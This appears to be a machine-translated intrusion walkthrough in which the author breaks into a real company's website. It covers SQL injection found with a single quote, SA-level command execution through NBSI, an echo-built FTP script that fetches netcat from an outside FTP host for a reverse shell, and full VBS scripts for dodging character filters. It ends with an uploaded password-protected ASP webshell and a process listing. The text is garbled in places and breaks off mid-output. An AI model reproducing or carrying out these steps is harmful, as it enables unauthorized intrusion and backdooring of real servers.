Clever application of scripts

Today, I saw an animation on the Internet. The animation shows how the security of those large companies is poor, so I decided to look at it and enter "group" on GOOGLE ", on the first page, you can click it to go to a company's website. Just click a connection and add a single quotation mark
Http://www.xxx.com.cn/gushi.asp? Pid = 8 & cid = 111
Dizzy, error returned:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft ole db Provider for ODBC Drivers error 80040e14
[Microsoft] [odbc SQL Server Driver] [SQL Server] strings are enclosed in unclosed quotation marks.
/Inc/artid. inc, row 8
The returned information is SQL Server.
Ping www.xxx.com.cn and return IP Address: 61. XX. XX.68. You can directly access this website through the IP address, which means it is an independent server.
I'm interested. It seems to be a rich company. I checked this connection with NBSI, and it turned out to be the SA permission!
Screen. width-300) this. width = screen. width-300 "border = 0>

I used SUPERSCAN to scan the open ports of this host and only opened port 80 and port 8080 (both provide web Services, it seems that _ blank "> firewall, expected ). In this case, adding a user to open 3389 is meaningless. I had to clarify the clues again.
First, you need to write an ftp.txt file using echoand then execute ftp-s: ftp.txt to download an nc. Execute the command in NBSI to reverse connect it to obtain its system permissions, but when I used ECHO to write a file, something went wrong. I entered an ECHO command and executed it four times. I entered the command echo open ftp.eviloctal.com> e: xxxwebapp3.txt (e: xxxwebis the root directory of the website. I wrote four times in the file and directly downloaded the file using ftp.txt.
Screen. width-300) this. width = screen. width-300 "border = 0>

(Note: It is recommended that you do not check the returned result when running the command with NBSI, because the execution of the command will be slow and slow, use the redirection character ">" to redirect the command execution result to the web directory, for example, dir c: can be written as dir c:> e: xxxwebapp1.txt is fast and then browsing the http://www.xxx.com.cn/app/1.txt e: xxxweb as the root directory of the website through browser view command execution results)
It would be nice to write the webshell (server:) in that sentence to the WEB directory, but the ECHO % is also filtered out no matter how it is. The echo ^ file is executed locally, but the % of the files generated no matter how it is executed in NBSI is filtered out. Content becomes:






In this case, there is no way to directly write a sentence to the ASP server backdoor. (The four reasons are the same as above.) I thought of writing a VBS script and passing the file content to be written as a parameter to the VBS script to generate the corresponding file.
The file writing script writefile. vbs (Command Format: cscript writefile. vbs "string to be written" target file) contains:
On error resume next: x = 1:
Str = replace (Wscript. Arguments (0), "=", vbcrlf): Enter =
Str = replace (str, "**", "): 'replace ** with the symbol"
Str = replace (str, "--", chr (38): 'replace -- with the symbol &
Str = replace (str, "@", chr (37): replace @
Set fso = CreateObject ("Scripting. FileSystemObject "):
Set a = fso. CreateTextFile (Wscript. Arguments (1), true): 'create a file. The file name is the second parameter given during execution.
If x = 1 then a. Write (str): x = 2: set fso = nothing: set a = nothingend if:
This file must use the ECHO command to write it to xxx. vbe or xxx. vbs on the server, and then use this VBS to write the file we want. (In the preceding example, the carriage return characters such as ", %, & cannot be directly transmitted to the script file as parameters. Therefore, replace these characters. The following script trans. vbs will complete the opposite process)
A simple explanation: the first statement is the most important, and the fault-tolerant statement continues to be executed no matter what error occurs in the subsequent program. The second is the IF statement. To prevent multiple statements from repeatedly writing the same content to the file, a flag is used. IF x = 1, the file is written. After writing the file, x is assigned to 2. Next, you may wonder why each statement is added after it: in fact, it is because I have considered that if there are multiple identical statements in the same line, the program can still be executed. For example:
Str = replace (Wscript. Arguments (0), "=", vbcrlf): str = replace (Wscript. Arguments (0), "=", vbcrlf ):
If str = replace (Wscript. Arguments (0), "=", vbcrlf)
When multiple identical statements are displayed in one row
Str = replace (Wscript. Arguments (0), "=", vbcrlf) str = replace (Wscript. Arguments (0), "=", vbcrlf)
In this way, the program cannot be executed normally.
", %, &, The carriage return cannot be directly passed to the script file as a parameter. It is easy to see that the carriage return is replaced by =, and the double quotation marks are replaced &, replace %. before writing a file, you must first convert the file you want to write to, for example, writefile. acceptable format of vbs. Use the following script to convert trans. vbs (the command format is the target file of the cscript trans. vbs source file ):
On error resume next
If Wscript. Arguments. count2 then
Wscript. echo "Incorrect Parameter format: cscript trans. vbs source file target file"
Wscript. quit
End if
Set fso = CreateObject ("Scripting. FileSystemObject ")
Set a = fso. openTextFile (Wscript. Arguments (0 ))
Str = a. readall
Str = replace (str, "," ** ") replace double quotation marks **
Str = replace (str, vbcrlf, "=") replace the carriage return with =
Str = replace (str, "&", "--") replace & --
Str = replace (str, "%", "@") replace % @@
Wscript. echo str
Set a = fso. CreateTextFile (Wscript. Arguments (1), True)
A. Write (str)
Run cscript trans. vbs one.txt onetrans.txt locally
In this example, one.txt contains the following backdoor content:
After conversion, the content in onetrans.txt is converted to the converted one: the file onetrans.txt is saved.
The ECHO code of writefile. vbs is:
Echo on error resume next: x = 1:> writefile. vbe
Echo str = replace (Wscript. Arguments (0), "=", vbcrlf):> writefile. vbe
Echo str = replace (str, "**", "):> writefile. vbe
Echo str = replace (str, "--", chr (38):> writefile. vbe
Echo str = replace (str, "@", chr (37):> writefile. vbe
Echo Set fso = CreateObject ("Scripting. FileSystemObject"):> writefile. vbe
Echo Set a = fso. CreateTextFile (Wscript. Arguments (1), true):> writefile. vbe
Echo if x = 1 then a. Write (str): x = 2: set fso = nothing: set a = nothingend if:> writefile. vbe
Execute the preceding Command Execution sentence on the NB Commander operator of NBSI and write it into a file writefile in the system directory of the other party. vbe, then you can write the backdoors of the server in one sentence to the WEB directory of the other party! Command:
Cscript writefile. vbe "" d: webapp1.asp (note that when the parameters passed to the script contain spaces, they must be enclosed by two double quotation marks !)
Corresponding address: http://www.xxx.com.cn/app/1.asp
Point the form action of post.htm to this address, and we can upload our Trojan horse to the server!
Screen. width-300) this. width = screen. width-300 "border = 0>

Execute post.htm and paste the ASP Trojan we used to save the file in the text box below. Click upload. When you successfully switch to the EST forum, the ASP Trojan is successfully uploaded!
I smoothly uploaded the Trojan horse storing the file to the server and named it advv. asp.
Screen. width-300) this. width = screen. width-300 "border = 0>

I have verified this Trojan so you must use this url to access it smoothly:
Http://www.xxx.com.cn/app/advv.asp? Id = haicao (an empty page is displayed when the parameter id = haicao is not added)
To implement password verification, you only need to add the following statement to the ASP file header. The haicao password can be modified by yourself.
Use the save file Trojan (the uploaded file here is advv. asp) to upload cmd. asp (also haicao password verification is added)
The script for listing processes is uploaded, and the file name is saved as list2.vbe:
Wscript. echo "PID ProcessName"
For each ps in getobject ("winmgmts: \. ootcimv2: win32_process"). instances _> e: xxxwebapp1.txt ie1.1.1.txt)
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
PID ProcessName
0 System Idle Process
8 System
160 SMSS. EXE
184 CSRSS. EXE
204 WINLOGON. EXE
232 SERVICES. EXE
244 LSASS. EXE
448 svchost.exe
480 spoolsv.exe
508 msdtc.exe
624 svchost. e